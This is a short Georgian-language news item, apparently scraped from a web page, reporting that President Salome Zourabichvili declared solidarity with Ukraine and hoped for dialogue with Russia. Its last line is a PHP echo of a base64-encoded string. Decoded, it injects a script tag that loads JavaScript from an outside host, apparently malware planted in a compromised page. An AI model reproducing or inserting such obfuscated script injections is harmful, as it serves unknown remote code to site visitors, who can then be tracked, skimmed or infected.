celsiusi
ავერსი საქკაბელი
საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა უკრაინას სოლიდარობა გამოუცხადა. 
 
პრეზიდენტი იმედოვნებს, რომ პროცესები დიალოგის რეჟიმში გადავა.ამის შესახებ მან მედიასთან შეხვედრისას ისაუბრა და აღნიშნა, რომ აგრესიულ ქმედებებს შედეგი არასდროს მოაქვს.
 
„მინდა, გამოვაცხადო სოლიდარობა უკრაინის მიმართ. იმედი მაქვს, რომ რუსეთი არ გამოიყენებს იმავე აგრესიას, რაც თავის დროზე საქართველოს მიმართ გამოიყენა. ეს ქმედებები არაფერთან არ მიდის, ამას შედეგი არ მოაქვს. დღევანდელი მსოფლიო არის სხვა, მე-20 საუკუნის ქმედებები უკვე ანაქრონულია. ამ ფორმით და ამ მიდგომებით ჩვენ მთლიანად დემოკრატიული მსოფლიო, ევროპა ვერ დავძლევთ იმ გლობალურ საფრთხეებს, რაც ყველამ ვიცით, რომ არსებობს. ასე რომ, იმედი მაქვს, ყველაფერი გადავა დიალოგის ფორმატში“, – განაცხადა სალომე ზურაბიშვილმა.
830
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");